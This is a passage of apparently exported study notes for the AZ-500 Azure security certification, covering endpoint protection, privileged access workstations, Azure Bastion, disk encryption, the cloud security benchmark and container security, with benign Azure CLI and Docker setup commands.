                            Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.

                            The capabilities on non-Windows platforms may be different from the ones for Windows.

                            Defender for Endpoint uses the following combination of technology built into Windows 10 and Microsoft's robust cloud service:

                            • Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and process behavioral signals from the operating system and send this sensor data to your private, isolated cloud instance of Microsoft Defender for Endpoint.
                            • Cloud security analytics: Leveraging big data, device learning, and unique Microsoft optics across the Windows ecosystem, enterprise cloud products (such as Office 365), and online assets, behavioral signals are translated into insights, detections, and recommended responses to advanced threats.
                            • Threat intelligence: Generated by Microsoft hunters, security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures and generate alerts when they are observed in collected sensor data.

                            Some features of Microsoft Defender for Endpoint:

                            Core Defender Vulnerability Management - Built-in core vulnerability management capabilities use a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.

                            Attack surface reduction - The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring configuration settings are properly set and exploit mitigation techniques are applied, the capabilities resist attacks and exploitation. This set of capabilities also includes network protection and web protection, which regulate access to malicious IP addresses, domains, and URLs.

                            Next-generation protection - To further reinforce the security perimeter of your network, Microsoft Defender for Endpoint uses next-generation protection designed to catch all types of emerging threats.

                            Endpoint detection and response - Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars. Advanced hunting provides a query-based threat-hunting tool that lets you proactively find breaches and create custom detections.

                            Automated investigation and remediation - In conjunction with being able to quickly respond to advanced attacks, Microsoft Defender for Endpoint offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.

                            Microsoft Secure Score for Devices - Defender for Endpoint includes Microsoft Secure Score for Devices to help you dynamically assess the security state of your enterprise network, identify unprotected systems, and take recommended actions to improve the overall security of your organization.

                            Microsoft Threat Experts - Microsoft Defender for Endpoint's new managed threat hunting service provides proactive hunting, prioritization, and additional context and insights that further empower Security operation centers (SOCs) to identify and respond to threats quickly and accurately.

                            Defender for Endpoint customers need to apply for the Microsoft Threat Experts managed threat hunting service to get proactive Targeted Attack Notifications and to collaborate with experts on demand.

                            Centralized configuration and administration, APIs - Integrate Microsoft Defender for Endpoint into your existing workflows.

                            Integration with Microsoft solutions - Defender for Endpoint directly integrates with various Microsoft solutions, including:

                            • Microsoft Defender for Cloud
                            • Microsoft Sentinel
                            • Intune
                            • Microsoft Defender for Cloud Apps
                            • Microsoft Defender for Identity
                            • Microsoft Defender for Office
                            • Skype for Business

Microsoft 365 Defender - With Microsoft 365 Defender, Defender for Endpoint and various Microsoft security solutions form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attacks.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#32-privileged-access-device","title":"3.2. Privileged Access Device","text":"

Zero Trust means that you don't purchase hardware from generic retailers, but only from an authorized OEM that supports Autopilot.

                            For this solution, root of trust will be deployed using Windows Autopilot technology with hardware that meets the modern technical requirements. To secure a workstation, Autopilot lets you leverage Microsoft OEM-optimized Windows 10 devices. These devices come in a known good state from the manufacturer. Instead of reimaging a potentially insecure device, Autopilot can transform a Windows 10 device into a \u201cbusiness-ready\u201d state. It applies settings and policies, installs apps, and even changes the edition of Windows 10.

                            To have a secured workstation you need to make sure the following security technologies are included on the device:

                            • Trusted Platform Module (TPM) 2.0
                            • BitLocker Drive Encryption
                            • UEFI Secure Boot
                            • Drivers and Firmware Distributed through Windows Update
                            • Virtualization and HVCI Enabled
                            • Drivers and Apps HVCI-Ready
                            • Windows Hello
                            • DMA I/O Protection
                            • System Guard
                            • Modern Standby

                            Levels of device security

| Device Type | Common usage scenario | Permitted activities | Security guidance |
| --- | --- | --- | --- |
| Enterprise Device | Home users, small business users, general purpose developers, and enterprise | Run any application, browse any website | Anti-malware and virus protection and policy-based security posture for the enterprise |
| Specialized Device | Specialized or secure enterprise users | Run approved applications, but cannot install apps. Email and web browsing allowed. No admin controls | No self-administration of device, no application installation, policy-based security, and endpoint management |
| Privileged Device | Extremely sensitive roles | IT Operations | No local admins, no productivity tools, locked-down browsing. PAW device |

                            This chart shows the level of device security controls based on how the device will be used.

A secure workstation requires that it be part of an end-to-end approach including device security, account security, and security policies applied to the device at all times. Here are some common security measures you should consider implementing based on the users' needs.

| Security Control | Enterprise Device | Specialized Device | Privileged Device |
| --- | --- | --- | --- |
| Microsoft Endpoint Manager (MEM) managed | Yes | Yes | Yes |
| Deny BYOD device enrollment | No | Yes | Yes |
| MEM security baseline applied | Yes | Yes | Yes |
| Microsoft Defender for Endpoint | Yes | Yes | Yes |
| Join personal device via Autopilot | Yes | Yes | No |
| URLs restricted to approved list | Allow Most | Allow Most | Deny Default |
| Removal of admin rights | | Yes | Yes |
| Application execution control (AppLocker) | | Audit -> Enforced | Yes |
| Applications installed only by MEM | | Yes | Yes |

","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#33-privileged-access-workstations-paw-workstations","title":"3.3. Privileged Access Workstations (PAW workstations)","text":"

                            PAW is a hardened and locked down workstation designed to provide high security assurances for sensitive accounts and tasks. PAWs are recommended for administration of identity systems, cloud services, and private cloud fabric as well as sensitive business functions. In order to provide the greatest security, PAWs should always run the most up-to-date and secure operating system available: Microsoft strongly recommends Windows 10 Enterprise, which includes several additional security features not available in other editions (in particular, Credential Guard and Device Guard).

                            • Internet attacks\u00a0- Isolating the PAW from the open internet is a key element to ensuring the PAW is not compromised.
                            • Usability risk\u00a0- If a PAW is too difficult to use for daily tasks, administrators will be motivated to create workarounds to make their jobs easier.
                            • Environment risks\u00a0- Minimizing the use of management tools and accounts that have access to the PAWs to secure and monitor these specialized workstations.
                            • Supply chain tampering\u00a0- Taking a few key actions can mitigate critical attack vectors that are readily available to attackers. This includes validating the integrity of all installation media (Clean Source Principle) and using a trusted and reputable supplier for hardware and software.
                            • Physical attacks\u00a0- Because PAWs can be physically mobile and used outside of physically secure facilities, they must be protected against attacks that leverage unauthorized physical access to the computer.

                            This methodology is appropriate for accounts with access to high value assets:

• Administrative Privileges - PAWs provide increased security for high-impact IT administrative roles and tasks. This architecture can be applied to administration of many types of systems, including Active Directory Domains and Forests, Microsoft Entra tenants, Microsoft 365 tenants, Process Control Networks (PCN), Supervisory Control and Data Acquisition (SCADA) systems, Automated Teller Machines (ATMs), and Point of Sale (PoS) devices.
• High Sensitivity Information workers - The approach used in a PAW can also provide protection for highly sensitive information worker tasks and personnel, such as those involving pre-announcement Merger and Acquisition activity, pre-release financial reports, organizational social media presence, executive communications, unpatented trade secrets, sensitive research, or other proprietary or sensitive data. This guidance does not discuss the configuration of these information worker scenarios in depth or include this scenario in the technical instructions.

Administrative "Jump Box" architectures set up a small number of administrative console servers and restrict personnel to using them for administrative tasks. This is typically based on Remote Desktop Services, a third-party presentation virtualization solution, or a Virtual Desktop Infrastructure (VDI) technology.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#34-virtual-machine-templates","title":"3.4. Virtual Machine templates","text":"

                            Here are some additional terms to know when using Resource Manager:

• Resource provider. A service that supplies Azure resources. For example, a common resource provider is Microsoft.Compute, which supplies the VM resource. Microsoft.Storage is another common resource provider.
• Resource Manager template. A JSON file that defines one or more resources to deploy to a resource group or subscription. You can use the template to consistently and repeatedly deploy the resources.
• Declarative syntax. Syntax that lets you state "Here's what I intend to create" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.

                            When you deploy a template, Resource Manager converts the template into REST API operations.

Here are two different deployment schemas with the same result:
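As a concrete illustration, here is a minimal, hedged sketch of deploying a template with the Azure CLI; the resource group name and template.json are placeholders, not values from the course.

```bash
# Create a resource group to deploy into (names are placeholders)
az group create --name MyResourceGroup --location westeurope

# Resource Manager converts this declarative template into REST API operations
az deployment group create \
  --resource-group MyResourceGroup \
  --template-file template.json
```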

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#35-remote-access-management-rdp-ssh-and-azure-bastion","title":"3.5. Remote Access Management: RDP, ssh, and Azure Bastion","text":"

                            This topic explains how to connect to and sign into the virtual machines (VMs) you created on Azure. Once you've successfully connected, you can work with the VM as if you were locally logged on to its host server.

Connect to a Windows VM with RDP, with SSH, or with the Azure Bastion service. The Azure Bastion service is a fully platform-managed PaaS service that you provision inside your virtual network. It provides secure and seamless RDP/SSH connectivity to your virtual machines directly in the Azure portal over TLS. Bastion provides secure RDP and SSH connectivity to all the VMs in the virtual network in which it is provisioned. Using Azure Bastion protects your virtual machines from exposing RDP/SSH ports to the outside world, while still providing secure access using RDP/SSH. With Azure Bastion, you connect to the virtual machine directly from the Azure portal.

                            Benefits of Bastion

                            You can deploy bastion hosts (also known as jump-servers) at the public side of your perimeter network. Bastion host servers are designed and configured to withstand attacks. Bastion servers also provide RDP and SSH connectivity to the workloads sitting behind the bastion, as well as further inside the network.

No hassle of managing NSGs: Azure Bastion is a fully managed PaaS service from Azure that is hardened internally to provide secure RDP/SSH connectivity. You don't need to apply any NSGs to the Azure Bastion subnet. Because Azure Bastion connects to your virtual machines over private IP, you can configure your NSGs to allow RDP/SSH from Azure Bastion only.

Protection against port scanning: Because you do not need to expose your virtual machines to the public Internet, your VMs are protected against port scanning by rogue and malicious users located outside your virtual network.

Protection against zero-day exploits, with hardening in one place only: Azure Bastion is a fully platform-managed PaaS service. Because it sits at the perimeter of your virtual network, you don't need to worry about hardening each of the virtual machines in your virtual network.
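A hedged provisioning sketch follows; it assumes an existing virtual network MyVNet, uses placeholder names throughout, and requires the bastion CLI extension. The subnet must be named AzureBastionSubnet.

```bash
# Dedicated subnet for Bastion (must be named AzureBastionSubnet, /26 or larger)
az network vnet subnet create \
  --resource-group MyResourceGroup \
  --vnet-name MyVNet \
  --name AzureBastionSubnet \
  --address-prefixes 10.0.1.0/26

# Bastion requires a Standard-SKU public IP
az network public-ip create \
  --resource-group MyResourceGroup \
  --name MyBastionIP \
  --sku Standard

# Provision the Bastion host itself (bastion CLI extension required)
az network bastion create \
  --resource-group MyResourceGroup \
  --name MyBastion \
  --public-ip-address MyBastionIP \
  --vnet-name MyVNet
```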

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#36-update-management","title":"3.6. Update Management","text":"

Azure Update Management is a service included as part of your Azure subscription. With Update Management, you can assess your update status across your environment and manage your Windows Server and Linux server updates from a single location, for both your on-premises and Azure environments.

Update Management is available at no additional cost (you pay only for the log data that Azure Log Analytics stores), and you can easily enable it for Azure and on-premises VMs. You can also enable Update Management for VMs directly from your Azure Automation account.

                            Configurations on managed computers:

                            • Microsoft Monitoring Agent (MMA) for Windows or Linux.
• PowerShell Desired State Configuration (DSC) for Linux.
                            • Hybrid Runbook Worker in Azure Automation.
                            • Microsoft Update or Windows Server Update Services (WSUS) for Windows computers.

                            Azure Automation uses runbooks to install updates. When an update deployment is created, it creates a schedule that starts a master update runbook at the specified time for the included computers. The master runbook starts a child runbook on each agent to install the required updates.

                            The Log Analytics agent for Windows and Linux needs to be installed on the VMs that are running on your corporate network or other cloud environment in order to enable them with Update Management.

                            From your Azure Automation account, you can:

                            • Onboard virtual machines
                            • Assess the status of available updates
                            • Schedule installation of required updates
                            • Review deployment results to verify that updates were applied successfully to all virtual machines for which Update Management is enabled

                            Azure Update Management provides the ability to deploy patches based on classifications. However, there are scenarios where you may want to explicitly list the exact set of patches. With update inclusion lists you can choose exactly which patches you want to deploy instead of relying on patch classifications.
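The course does not include commands for this, but as a minimal sketch under assumed placeholder names, the two resources Update Management builds on (a Log Analytics workspace and an Automation account) can be created with the Azure CLI; the automation commands come from the automation CLI extension.

```bash
az group create --name MyAutomationRG --location westeurope

# Workspace that stores the update assessment log data
az monitor log-analytics workspace create \
  --resource-group MyAutomationRG \
  --workspace-name MyWorkspace

# Automation account that runs the update runbooks (automation extension)
az automation account create \
  --resource-group MyAutomationRG \
  --automation-account-name MyAutomationAccount \
  --location westeurope
```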

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#37-disk-encryption","title":"3.7. Disk encryption","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#windows","title":"WINDOWS","text":"

Azure Disk Encryption for Windows VMs helps protect and safeguard your data to meet your organizational security and compliance commitments. It uses the BitLocker feature of Windows to provide volume encryption for the OS and data disks of Azure virtual machines (VMs), and is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets. Azure Disk Encryption is zone resilient, the same way as Virtual Machines.

                            Supported VMs. - Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage. Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines with less than 2 GB of memory.

Supported operating systems:
• Windows client: Windows 8 and later.
• Windows Server: Windows Server 2008 R2 and later.
• Windows 10 Enterprise multi-session.

                            To enable Azure Disk Encryption, the VMs must meet the following network endpoint configuration requirements:

                            • To get a token to connect to your key vault, the Windows VM must be able to connect to a Microsoft Entra endpoint, [login.microsoftonline.com].
                            • To write the encryption keys to your key vault, the Windows VM must be able to connect to the key vault endpoint.
                            • The Windows VM must be able to connect to an Azure storage endpoint that hosts the Azure extension repository and an Azure storage account that hosts the VHD files.
                            • If your security policy limits access from Azure VMs to the Internet, you can resolve the preceding URI and configure a specific rule to allow outbound connectivity to the IPs.

Group Policy requirements. - Azure Disk Encryption uses the BitLocker external key protector for Windows VMs. For domain-joined VMs, don't push any group policies that enforce TPM protectors. BitLocker policy on domain-joined virtual machines with custom group policy must include the following setting: Configure user storage of BitLocker recovery information -> Allow 256-bit recovery key. Azure Disk Encryption fails when custom group policy settings for BitLocker are incompatible. On machines that didn't have the correct policy setting, apply the new policy, force a policy update (gpupdate.exe /force), and then restart if required. Azure Disk Encryption also fails if domain-level group policy blocks the AES-CBC algorithm, which BitLocker uses.

Encryption key storage requirements. - Azure Disk Encryption requires an Azure Key Vault to control and manage disk encryption keys and secrets. Your key vault and VMs must reside in the same Azure region and subscription.
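A hedged end-to-end sketch with placeholder names: create a key vault enabled for disk encryption in the VM's region, then enable ADE on a Windows VM.

```bash
# Key vault must be in the same region and subscription as the VM
az keyvault create \
  --name MyKeyVault \
  --resource-group MyResourceGroup \
  --enabled-for-disk-encryption

# Enable Azure Disk Encryption (BitLocker) on the Windows VM
az vm encryption enable \
  --resource-group MyResourceGroup \
  --name MyWindowsVM \
  --disk-encryption-keyvault MyKeyVault

# Verify the encryption status
az vm encryption show --resource-group MyResourceGroup --name MyWindowsVM
```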

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#linux","title":"LINUX","text":"

Supported VMs. - Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage.

Note: Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines that do not meet these minimum memory requirements:

| Virtual machine | Minimum memory requirement |
| --- | --- |
| Linux VMs when only encrypting data volumes | 2 GB |
| Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is 4 GB or less | 8 GB |
| Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is greater than 4 GB | The root file system usage x 2; for instance, 16 GB of root file system usage requires at least 32 GB of RAM |

                            Once the OS disk encryption process is complete on Linux virtual machines, the VM can be configured to run with less memory.

Azure Disk Encryption requires the dm-crypt and vfat modules to be present on the system. Removing or disabling vfat from the default image will prevent the system from reading the key volume and obtaining the key needed to unlock the disks on subsequent reboots. System hardening steps that remove the vfat module from the system are not compatible with Azure Disk Encryption.
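A quick way to confirm those modules inside the Linux VM (a simple sketch, not from the course):

```bash
# Check whether dm_crypt and vfat are loaded or at least available
grep -E 'dm_crypt|vfat' /proc/modules   # currently loaded modules
modinfo dm_crypt vfat                   # fails if a module was removed by hardening
```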

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#38-managed-disk-encryption-options","title":"3.8. Managed disk encryption options","text":"

                            There are several types of encryption available for your managed disks, including Azure Disk Encryption (ADE), Server-Side Encryption (SSE), and encryption at the host.

• Azure Disk Encryption (ADE) helps protect and safeguard your data to meet organizational security and compliance commitments. ADE encrypts the OS and data disks of Azure virtual machines (VMs) inside your VMs by using the DM-Crypt device-mapper feature of Linux or the BitLocker feature of Windows. ADE is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets.
• Azure Disk Storage Server-Side Encryption (also referred to as encryption-at-rest or Azure Storage encryption) automatically encrypts data stored on Azure-managed disks (OS and data disks) when persisting on the Storage Clusters. When configured with a Disk Encryption Set (DES), it supports customer-managed keys as well.
• Encryption at the host ensures that data stored on the VM host hosting your VM is encrypted at rest and flows encrypted to the Storage clusters.
• Confidential disk encryption binds disk encryption keys to the virtual machine's TPM (Trusted Platform Module) and makes the protected disk content accessible only to the VM. The TPM and VM guest state is always encrypted in attested code using keys released by a secure protocol that bypasses the hypervisor and host operating system. It is currently only available for the OS disk; encryption at the host may be used for other disks on a Confidential VM in addition to Confidential Disk Encryption.

For Encryption at the host and Confidential disk encryption, Microsoft Defender for Cloud does not detect the encryption state; Microsoft is in the process of updating Microsoft Defender.
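For the server-side encryption option with customer-managed keys, a hedged sketch (assuming an existing key vault MyKeyVault containing a key MyKey; all names are placeholders):

```bash
# Look up the key URL and vault resource ID
keyUrl=$(az keyvault key show --vault-name MyKeyVault --name MyKey --query key.kid -o tsv)
vaultId=$(az keyvault show --name MyKeyVault --query id -o tsv)

# Create the Disk Encryption Set (DES) referencing the customer-managed key
az disk-encryption-set create \
  --resource-group MyResourceGroup \
  --name MyDES \
  --key-url "$keyUrl" \
  --source-vault "$vaultId"

# The DES managed identity must then be granted access to the vault
az keyvault set-policy --name MyKeyVault \
  --object-id "$(az disk-encryption-set show --resource-group MyResourceGroup --name MyDES --query identity.principalId -o tsv)" \
  --key-permissions get wrapKey unwrapKey
```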

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#39-windows-defender","title":"3.9. Windows Defender","text":"

                            Windows 10, Windows Server 2019, and Windows Server 2016 include key security features. They are Windows Defender Credential Guard, Windows Defender Device Guard, and Windows Defender Application Control.

                            • Windows Defender Credential Guard: Introduced in Windows 10 Enterprise and Windows Server 2016, Windows Defender Credential Guard uses virtualization-based security enhancement to isolate secrets so that only privileged system software can access them. Unauthorized access to these secrets might lead to credential theft attacks, such as Pass-the-Hash or pass-the-ticket attacks. Windows Defender Credential Guard helps prevent these attacks by helping protect Integrated Windows Authentication (NTLM) password hashes, Kerberos authentication ticket-granting tickets, and credentials that applications store as domain credentials.
• Windows Defender Application Control: Helps mitigate security threats by restricting the applications that users can run and the code that runs in the system core, or kernel. Policies in Windows Defender Application Control also block unsigned scripts and MSIs, and force Windows PowerShell to run in Constrained Language mode.
• Windows Defender Device Guard: The term device guard continues to describe the fully locked-down state achieved by combining Windows Defender Application Control, HVCI, and hardware and firmware security features. It also allows Microsoft to work with its original equipment manufacturer (OEM) partners to identify specifications for devices that are device guard capable, so that joint customers can easily purchase devices that meet all the hardware and firmware requirements of the original locked-down scenario of Windows Defender Device Guard for Windows 10 devices.

                            Microsoft Defender for Endpoint - Supported Operating Systems

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#310-microsoft-cloud-security-benchmark-in-defender-for-cloud","title":"3.10. Microsoft cloud security benchmark in Defender for Cloud","text":"

The Microsoft cloud security benchmark (MCSB) provides prescriptive best practices and recommendations to help improve the security of workloads, data, and services on Azure and your multicloud environment. This benchmark focuses on cloud-centric control areas with input from a set of holistic Microsoft and industry security guidance that includes:

• Cloud Adoption Framework: Guidance on security, including strategy, roles and responsibilities, Azure Top 10 Security Best Practices, and reference implementation.
• Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
• The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
• Other industry and cloud service providers' security best-practice standards and frameworks: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and the Payment Card Industry Data Security Standard (PCI-DSS).

The Azure Security Benchmark (ASB), now the Microsoft cloud security benchmark (MCSB), helps you quickly work with different clouds by:

                            • Providing a single control framework to easily meet the security controls across clouds
                            • Providing consistent user experience for monitoring and enforcing the multicloud security benchmark in Defender for Cloud
                            • Staying aligned with Industry Standards (e.g., Center for Internet Security, National Institute of Standards and Technology, Payment Card Industry)

Automated control monitoring for AWS in Microsoft Defender for Cloud: You can use the Microsoft Defender for Cloud Regulatory Compliance Dashboard to monitor your AWS environment against the Microsoft cloud security benchmark (MCSB), just like you monitor your Azure environment. Microsoft developed approximately 180 AWS checks for the new AWS security guidance in MCSB, allowing you to monitor your AWS environment and resources in Microsoft Defender for Cloud.

                            Some controls:

| Control domain | Description |
| --- | --- |
| Network Security (NS) | Covers controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS). |
| Identity Management (IM) | Covers controls to establish a secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentication, managed identities (and service principals) for applications, conditional access, and account anomaly monitoring. |
| Privileged Access (PA) | Covers controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk. |
| Data Protection (DP) | Covers control of data protection at rest, in transit, and via authorized access mechanisms, including discovering, classifying, protecting, and monitoring sensitive data assets using access control, encryption, key management, and certificate management. |
| Asset Management (AM) | Covers controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory, and managing approvals for services and resources (inventory, track, and correct). |
| Logging and Threat Detection (LT) | Covers controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with security event management (SEM), time synchronization, and log retention. |
| Incident Response (IR) | Covers controls in the incident response life cycle (preparation, detection and analysis, containment, and post-incident activities), including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process. |
| Posture and Vulnerability Management (PV) | Focuses on controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources. |
| Endpoint Security (ES) | Covers controls in endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware services for endpoints in cloud environments. |
| Backup and Recovery (BR) | Covers controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected. |
| DevOps Security (DS) | Covers the controls related to security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure security throughout the DevOps process; it also includes common topics such as threat modeling and software supply chain security. |
| Governance and Strategy (GS) | Provides guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, a unified technical strategy, and supporting policies and standards. |

3.11. Microsoft Defender for Cloud recommendations

Using the policies, Defender for Cloud periodically analyzes the compliance status of your resources to identify potential security misconfigurations and weaknesses. It then provides you with recommendations on how to remediate those issues. Recommendations result from assessing your resources against the relevant policies and identifying resources that aren't meeting your defined requirements.

Defender for Cloud makes its security recommendations based on your chosen initiatives. When a policy from your initiative is compared against your resources and finds one or more that aren't compliant, it is presented as a recommendation in Defender for Cloud.

Recommendations are actions for you to take to secure and harden your resources. In practice, it works like this:

1. Azure Security Benchmark is an initiative that contains requirements. For example, Azure Storage accounts must restrict network access to reduce their attack surface.

2. The initiative includes multiple policies, each requiring a specific resource type. These policies enforce the requirements in the initiative. To continue the example, the storage requirement is enforced with the policy "Storage accounts should restrict network access using virtual network rules."

3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a recommendation to fix that situation and harden the security of resources that aren't meeting your security requirements. For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you'll see the recommendation to harden those resources.

So, (1) an initiative includes (2) policies that generate (3) environment-specific recommendations.
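Illustrative only (the exact output shape varies by CLI version): the resulting assessments can be listed for the current subscription from the command line.

```bash
# List Defender for Cloud assessments (the recommendations described above)
az security assessment list -o table
```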

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#4-containers-security","title":"4. Containers security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#41-containers","title":"4.1. Containers","text":"

A container is an isolated, lightweight silo for running an application on the host operating system. Containers build on top of the host operating system's kernel (which can be thought of as the buried plumbing of the operating system), and contain only apps and some lightweight operating system APIs and services that run in user mode. While a container shares the host operating system's kernel, the container doesn't get unfettered access to it. Instead, the container gets an isolated (and in some cases virtualized) view of the system. For example, a container can access a virtualized version of the file system and registry, but any changes affect only the container and are discarded when it stops. To save data, the container can mount persistent storage such as an Azure Disk or a file share (including Azure Files).

You need Docker in order to work with Windows Containers. Docker consists of the Docker Engine (dockerd.exe) and the Docker client (docker.exe).

How it works. - A container builds on top of the kernel, but the kernel doesn't provide all of the APIs and services an app needs to run; most of these are provided by system files (libraries) that run above the kernel in user mode. Because a container is isolated from the host's user mode environment, the container needs its own copy of these user mode system files, which are packaged into something known as a base image. The base image serves as the foundational layer upon which your container is built, providing it with operating system services not provided by the kernel.

Because containers require far fewer resources (for example, they don't need a full OS), they're easy to deploy and they start fast. This allows you to have higher density, meaning that it allows you to run more services on the same hardware unit, thereby reducing costs. As a side effect of running on the same kernel, you get less isolation than with VMs.

                            Features

                            Isolation. - Typically provides lightweight isolation from the host and other containers, but doesn't provide as strong a security boundary as a VM. (You can increase the security by using Hyper-V isolation mode to isolate each container in a lightweight VM).

                            Operating System. - Runs the user mode portion of an operating system, and can be tailored to contain just the needed services for your app, using fewer system resources.

                            Deployment. - Deploy individual containers by using Docker via command line; deploy multiple containers by using an orchestrator such as Azure Kubernetes Service.

                            Persistent storage. - Use Azure Disks for local storage for a single node, or Azure Files (SMB shares) for storage shared by multiple nodes or servers.

                            Fault tolerance. - If a cluster node fails, any containers running on it are rapidly recreated by the orchestrator on another cluster node.

Networking. - Uses an isolated view of a virtual network adapter, providing slightly less virtualization (the host's firewall is shared with containers) while using fewer resources.

                            In Docker, each layer is the resulting set of changes that happen to the filesystem after executing a command, such as, installing a program. So, when you view the filesystem after the layer has been copied, you can view all the files, including the layer when the program was installed. You can think of an image as an auxiliary read-only hard disk ready to be installed in a \"computer\" where the operating system is already installed. Similarly, you can think of a container as the \"computer\" with the image hard disk installed. The container, just like a computer, can be powered on or off.
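A small demonstration of the layer model using Docker directly; the image name is a placeholder.

```bash
cat > Dockerfile <<'EOF'
# Base image: the user-mode OS files the kernel does not provide
FROM ubuntu:22.04
# Each filesystem-changing instruction adds a new read-only layer
RUN apt-get update && apt-get install -y curl
CMD ["curl", "--version"]
EOF

docker build -t layers-demo .
docker history layers-demo    # shows the stacked layers
docker run --rm layers-demo   # "powers on" a container from the image
```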

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#42-azure-container-instances-aci-security","title":"4.2. Azure Container Instances (ACI) security","text":"

                            There are many security recommendations for Azure Container Instances, use these to optimize your security for containers.

                            Use a private registry: Containers are built from images that are stored in one or more repositories. These repositories can belong to a public registry, like Docker Hub, or to a private registry. An example of a private registry is the Docker Trusted Registry, which can be installed on-premises or in a virtual private cloud. You can also use cloud-based private container registry services, including Azure Container Registry. A publicly available container image does not guarantee security. Container images consist of multiple software layers, and each software layer might have vulnerabilities. To help reduce the threat of attacks, you should store and retrieve images from a private registry, such as Azure Container Registry or Docker Trusted Registry. In addition to providing a managed private registry, Azure Container Registry supports service principal-based authentication through Microsoft Entra ID for basic authentication flows. This authentication includes role-based access for read-only (pull), write (push), and other permissions.
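As a hedged sketch with placeholder names, creating a private registry and importing a public image into it so workloads pull only from a registry you control:

```bash
az acr create \
  --resource-group MyResourceGroup \
  --name myprivateregistry \
  --sku Premium

# Import (rather than pull) a public image into the private registry
az acr import \
  --name myprivateregistry \
  --source docker.io/library/nginx:latest \
  --image nginx:latest
```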

Monitor and scan container images continuously: Take advantage of solutions to scan container images in a private registry and identify potential vulnerabilities. It's important to understand the depth of threat detection that the different solutions provide. For example, Azure Container Registry optionally integrates with Microsoft Defender for Cloud to automatically scan all Linux images pushed to a registry. Microsoft Defender for Cloud's integrated Qualys scanner detects image vulnerabilities, classifies them, and provides remediation guidance.

                            Protect credentials: Containers can spread across several clusters and Azure regions. So, you must secure credentials required for logins or API access, such as passwords or tokens. Ensure that only privileged users can access those containers in transit and at rest. Inventory all credential secrets, and then require developers to use emerging secrets-management tools that are designed for container platforms. Make sure that your solution includes encrypted databases, TLS encryption for secrets data in transit, and least-privilege role-based access control. Azure Key Vault is a cloud service that safeguards encryption keys and secrets (such as certificates, connection strings, and passwords) for containerized applications. Because this data is sensitive and business critical, secure access to your key vaults so that only authorized applications and users can access them.

                            Use vulnerability management as part of your container development lifecycle: By using effective vulnerability management throughout the container development lifecycle, you improve the odds that you identify and resolve security concerns before they become a more serious problem.

Scan for vulnerabilities: New vulnerabilities are discovered all the time, so scanning for and identifying vulnerabilities is a continuous process. Incorporate vulnerability scanning throughout the container lifecycle.

